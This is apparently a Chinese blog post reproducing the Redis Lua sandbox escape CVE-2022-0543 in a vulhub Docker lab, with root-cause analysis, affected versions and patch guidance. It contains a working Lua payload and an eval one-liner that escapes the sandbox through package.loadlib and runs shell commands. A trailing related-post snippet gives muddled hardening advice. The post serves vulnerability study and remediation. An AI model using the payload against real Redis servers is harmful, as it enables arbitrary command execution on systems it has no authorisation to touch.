Redis Lua 沙盒逃逸漏洞(CVE-2022-0543)

原创 已于 2022-03-18 10:50:31 修改
· 8k 阅读 · 6 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#lua #redis #开发语言

于 2022-03-18 10:49:07 首次发布

1.漏洞描述

        Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

2.漏洞原理

        Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。Ubuntu/Debian/CentOS等这些发行版本会在原始软件的基础上打一些补丁包,例如Debian给Redis打的补丁,增加了一个include。

        Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。

debian这个include的这段代码是在make的时候用shell脚本动态生成的:

debian/lua_libs_debian.c:
    echo "// Automatically generated; do not edit." >$@
    echo "luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package);" >>$@
    set -e; for X in $(LUA_LIBS_DEBIAN_NAMES); do \
        echo "if (luaL_dostring(lua, \"$$X = require('$$X');\"))" >>$@; \
        echo "    serverLog(LL_NOTICE, \"Error loading $$X library\");" >>$@; \
    done
    echo 'luaL_dostring(lua, "module = nil; require = nil;");' >>$@

-> luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package);

        在原始的redis源码里全局搜索一下这句话,可以发现这句话原本就是存在于源码里的,但是通过条件宏的方式注释掉了,将其注释掉的原因就是“for sandboxing concerns”。 但是Debian的这个补丁却把这句话重新写进去了,而这句话的意思就是向lua的上下文中注入一个package模块。

https://i-blog.csdnimg.cn/blog_migrate/d8bac5b511149afb19a9534bfda06bca.png

我们可以利用这个模块,来加载任意Lua库,最终逃逸沙箱,执行任意命令。

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

3.影响版本

2.2 <= redis < 5.0.13

2.2 <= redis < 6.0.15

2.2 <= redis < 6.2.5

4.环境搭建

安装docker,更新vulhub

git pull

进入vulhub/redis/CVE-2022-0543,启动漏洞环境

docker-compose up -d

5.漏洞复现

Kali安装redis-cli工具 apt-get install redis-server

使用redis-cli工具连接redis数据库

redis-cli -h 192.168.42.145 –p 6379

发送恶意代码,可以看到回显数据为执行命令id的内容

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

6.修复建议

升级更新Redis软件包到以下版本:

Debian

Debian Redis(buster):5:5.0.14-1+deb10u2

Debian Redis(bullseye):5:6.0.16-1+deb11u2

Debian Redis(unstable):5:6.0.16-2

Ubuntu

Ubuntu 21.10 Redis:5:6.0.15-1ubuntu0.1

Ubuntu 20.04 Redis:5:5.0.7-2ubuntu0.1

修复方法:在 Lua 初始化的末尾添加package=nil

Redis 逃逸漏洞复现(CVE-2022-0543
hicode0101的博客
01-17 716
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。值得注意的是,不同环境下的liblua库路径不同,你需要指定一个正确的路径。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
CVE-2022-0543 Redis逃逸漏洞
weixin_45715461的博客
07-01 3684
CVE-2022-0543 Redis逃逸漏洞
脚本:我开发的所有Lua脚本,包括漏洞利用脚本(请仅将其用于教育目的)
02-28
剧本 我开发的所有Lua脚本,包括漏洞利用脚本(请仅将其用于教育目的)
CVE-2022-0543 Redis Lua绕过 命令执行
Foreverlove112的博客
09-22 639
CVE-2022-0543 Redis Lua绕过 命令执行
sandbox.lua:运行不可信Lua代码的安全
最新发布
gitblog_01156的博客
04-24 686
sandbox.lua:运行不可信Lua代码的安全箱 sandbox.lua A lua sandbox for executing non-trusted code 项目地址: https://gitcode.com/gh_m...
Redis Lua Script 溢出漏洞CVE-2024-31449)
Bertram的博客
02-26 1361
Redis Lua Script 溢出漏洞CVE-2024-31449)
Redis Lua绕过 命令执行(CVE-2022-0543)漏洞复现
XXokok的博客
11-25 799
Redis Lua绕过 命令执行(CVE-2022-0543)漏洞复现
Linux环境加密lua脚本,Wireshark Lua脚本文件任意代码执行漏洞
weixin_39621860的博客
05-11 157
发布日期:2011-07-30更新日期:2011-09-08受影响系统:Wireshark Wireshark 1.6.xWireshark Wireshark 1.4.x不受影响系统:Wireshark Wireshark 1.6.2Wireshark Wireshark 1.4.9描述:------------------------------------------------------...
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
MateSnake的博客
05-13 1311
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
Redis Lua绕过命令执行(CVE-2022-0543
Blue的博客
03-23 5682
漏洞描述 Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令;要利用此漏洞,攻击者需具有执行 eval 命令的权限(攻击者经过认证、或者 Redis 本身未设置鉴权检查)。 漏洞范围 只影响运行在 Debian 系的 Linux 发行版系统(Debian、Ubuntu
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
没有故事
04-18 1137
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。输入网址和端口,点击OK。
Redis系列漏洞总结
NLost
10-21 6833
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 绕过rce
SSRF漏洞Redis利用篇
weixin_39664643的博客
01-21 3584
SSRF漏洞Redis利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网中Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
浅谈Redis漏洞
weixin_43960884的博客
07-20 457
Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行未授权的访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在未授权访...
Redis漏洞汇总
Jietewang的博客
08-11 8351
前言 redis是一个key-value存储系统,拥有很强大的功能,目前的普及率很高,reids默认端口是6379。造成为授权漏洞的原因不是逻辑漏洞(:》),是安全配置未作限制的原因,如果主机非内网主机,且拥有互联网IP那么redis大概率存在未授权漏洞,本人遇到的是这样的。 1.未授权访问漏洞 redis默认情况是空密码连接,如果在root用户下安装的话,这是十分危险的,有多危险呢?大概( )这么危险。 ...
Redis漏洞总结
2301_77498991的博客
04-10 783
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。但是要保证硬盘文件不被删除,而主从复制则能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4863
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
中间件漏洞redis
2301_80661529的博客
03-14 1108
1.Redis服务器被挖矿案例我没有体验过,那就看看别人的把2.redis常见用途缓存、数据共享分布式、1.缓存:字符类型缓存例如:热点数据缓存(例如报表、明星出轨),对象缓存、全页缓存、可以提升热点数据的访问数据。2.数据共享分布式:字符类型因为redis是分布式的独立服务,可以在多个应用之间共享例如:分步式session3.分布式锁:字符串类型setnx方法,只有不存在时才能添加成功,返回true4.全局IDint型,incrby,利用原子性分库分表的场景,一次性拿一段5.计数器。
Redis存在安全漏洞CVE-2024-46981修复方法
01-09
针对 Redis 安全漏洞 CVE-2024-46981 的修复方法如下: ### 修补措施 #### 更新至安全版本 确保使用最新稳定版的 Redis 可有效防止此漏洞的影响。官方维护团队会在新版本中集成必要的补丁来解决已知的安全问题[^2]。 对于受支持的操作系统发行版,可以通过包管理器获取最新的软件包: ```bash sudo apt update && sudo apt install redis-server ``` 如果采用源码编译的方式安装,则需前往官方网站下载对应版本并重新构建服务端程序: ```bash tar xzf redis-<version>.tar.gz cd redis-<version> make sudo make install ``` #### 配置强化建议 调整 `redis.conf` 文件中的设置参数以增强安全性[^1]: - **绑定特定IP地址**:通过 bind 指令指定允许连接服务器的具体 IP 地址列表。 ```conf bind 127.0.0.1 ::1 ``` - **启用身份验证机制**:设定密码保护,即使网络被攻破也能阻止未授权访问。 ```conf requirepass your_strong_password_here ``` - **限制最大内存占用量**:避免因恶意操作导致资源耗尽而引发的服务不可用状况。 ```conf maxmemory <bytes> ``` - **关闭不必要的模块加载功能**:减少潜在风险点。 ```conf module-load /path/to/trusted/module.so ``` 完成上述更改之后重启 Redis 实例使修改生效: ```bash sudo systemctl restart redis.service ``` 为了确认升级成功以及配置无误,可以执行以下命令查看当前运行实例的信息: ```bash redis-cli info server | grep "redis_version" ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值